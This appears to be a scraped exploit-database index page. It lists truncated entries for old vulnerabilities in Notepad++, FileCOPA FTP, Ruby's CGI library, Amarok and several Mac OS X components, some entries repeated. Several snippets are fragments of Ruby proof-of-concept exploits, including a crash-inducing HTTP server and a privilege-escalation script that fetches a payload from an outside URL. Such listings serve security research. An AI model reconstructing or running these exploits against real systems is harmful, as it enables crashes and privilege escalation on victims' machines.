Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow

/ notepad++v4.1: win32 ruby file processing buffer overflow exploit. by: vade79/v9 [email protected] fakehalo/realhalo compile: gcc xnotepad++.c -o xnotepad++ syntax: ./xnotepad++ -xe -f filename notepad++ homepage/url: http://sourceforge.net/projects/notepad-plus/ http://notepad-plus.sourceforge.ne...

notepad++ 4.1 ruby file processing Buffer Overflow Exploit (win32)

Exploit for unknown platform in category local exploits ================================================================== notepad++ 4.1 ruby file processing Buffer Overflow Exploit win32 ================================================================== / notepad++v4.1: win32 ruby file processin...

FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit (2)

Exploit for unknown platform in category remote exploits ===================================================================== FileCOPA FTP Server = 1.01 LIST Remote Buffer Overflow Exploit 2 =====================================================================...

Mandrake Linux Security Advisory : ruby (MDKSA-2006:192)

The CGI library in Ruby 1.8 allowed a remote attacker to cause a Denial of Service via an HTTP request with a multipart MIME body that contained an invalid boundary specifier, which would result in an infinite loop and CPU consumption. Updated packages have been patched to correct this issue...

Mandrake Linux Security Advisory : ruby (MDKSA-2006:225)

Another vulnerability has been discovered in the CGI library cgi.rb that ships with Ruby which could be used by a malicious user to create a denial of service attack DoS. Updated packages have been patched to correct this issue. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive...

CVE-2006-6979

The ruby handlers in the Magnatune component in Amarok do not properly quote text in certain contexts, probably including construction of an unzip command line, which allows attackers to execute arbitrary commands via shell metacharacters...

CVE-2006-6979

The ruby handlers in the Magnatune component in Amarok do not properly quote text in certain contexts, probably including construction of an unzip command line, which allows attackers to execute arbitrary commands via shell metacharacters...

Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Vulnerabilities

!/usr/bin/ruby c 2006 Lance M. Havok All Rights Reserved. basic proof of concept for MOAB-29-01-2007 require 'digest/sha1' require 'rubygems' require 'net/dns/mdns-sd' bugselected = ARGV0 || "0".toi TMPARR = DNSSD = Net::DNS::MDNSSD trap"INT" puts "++ Exiting..." begin TMPARR.each do |o| o.stop e...

MOAB-28-01-2007.rb.txt

!/usr/bin/ruby Copyright c 2007 Kevin Finisterre Lance M. Havok All pwnage reserved. 1 Stop crashdump from writing to /Library/Logs via chmod 000 /Library/Logs/CrashReporter 2 Make symlink to /Library/Logs/CrashReporter/knownprog.crash.log 3 Create a program with a modified LINKEDIT segment that...

MOAB-25-01-2007.rb.txt

!/usr/bin/ruby c Copyright 2007 Lance M. Havok Proof of concept for MOAB-25-01-2007. require 'socket' webport = ARGV0 || 80.toi puts "++ Starting HTTP server at port webport." webserver = TCPServer.newnil, webport while session = webserver.accept randclen = rand80 useragent =...

Apple CFNetwork - HTTP Response Denial of Service

!/usr/bin/ruby c Copyright 2007 Lance M. Havok Proof of concept for MOAB-25-01-2007. require 'socket' webport = ARGV0 || 80.toi puts "++ Starting HTTP server at port webport." webserver = TCPServer.newnil, webport while session = webserver.accept randclen = rand80 useragent =...

Apple CFNetwork HTTP Response Denial of Service Exploit (rb code)

Exploit for macOS platform in category dos / poc ================================================================= Apple CFNetwork HTTP Response Denial of Service Exploit rb code ================================================================= !/usr/bin/ruby c Copyright 2007 Lance M. Havok Proof...

Apple CFNetwork - HTTP Response Denial of Service (Ruby)

Apple CFNetwork - HTTP Response Denial of Service Ruby !/usr/bin/ruby c Copyright 2007 Lance M. Havok Proof of concept for MOAB-25-01-2007. require 'socket' webport = ARGV0 || 80.toi puts "++ Starting HTTP server at port webport." webserver = TCPServer.newnil, webport while session =...

MOAB-22-01-2007.rb.txt

!/usr/bin/ruby Copyright c 2007 Kevin Finisterre Lance M. Havok All pwnage reserved. "Exploit" for MOAB-22-01-2007: All your crash are belong to us. require 'fileutils' bugselected = ARGV0 || 0.toi INPUTMANAGERURL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007im.tar.gz"...

Mac OS X 10.4.8 (UserNotificationCenter) Privilege Escalation Exploit

No description provided by source. !/usr/bin/ruby Copyright c 2007 Kevin Finisterre kflists at digitalmunition.com Lance M. Havok lmh at info-pull.com All pwnage reserved. "Exploit" for MOAB-22-01-2007: All your crash are belong to us. require 'fileutils' bugselected = ARGV0 || 0.toi...

Apple Mac OSX 10.4.8 - &#039;UserNotificationCenter&#039; Local Privilege Escalation

!/usr/bin/ruby Copyright c 2007 Kevin Finisterre Lance M. Havok All pwnage reserved. "Exploit" for MOAB-22-01-2007: All your crash are belong to us. require 'fileutils' bugselected = ARGV0 || 0.toi INPUTMANAGERURL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007im.tar.gz" keeping a...

MOAB-16-01-2007: Multiple Colloquy IRC Format String Vulnerabilities

Summary Traditionally, chat clients on the Mac have been anything but glamorous. Colloquy is an advanced IRC & SILC client which aims to fill this void. By adhering to Mac OS X interface conventions, Colloquy has the look and feel of a quality Mac application. By making a common mistake the...

MOAB-17-01-2007.rb.txt

!/usr/bin/ruby c Copyright 2006 Lance M. Havok Kevin Finisterre All pwnage reserved. Proof of concept for MOAB-17-01-2007 http://projects.info-pull.com/moab/MOAB-17-01-2007.html Originally reported to Apple by Kevin, on 08/02/2006. require 'socket' targetpath = ARGV0 || '/var/run/slpipc' slpsocke...

MOAB-18-01-2007.rb.txt

!/usr/bin/ruby Copyright c Lance M. Havok Keiv Finisterre Proof of concept for issues described in MOAB-18-01-2007. require 'net/ftp' require 'socket' bugselected = ARGV0 || 0.toi targethost = ARGV1 || "localhost" targetuser = ARGV2 || "anonymous" targetpass = ARGV3 || "rumproast" def listbugo...

MOAB-15-01-2007.rb.txt

!/usr/bin/ruby Exploit for MOAB-15-01-2007 c 2006 LMH . Note: It's a generic exploit, you can use it over any binary writable which is set as root setuid by diskutil repair permissions. Simply change the path. Blame Apple for doing such a piece of and relying on flawed DAC. Line-noise: Jackass of...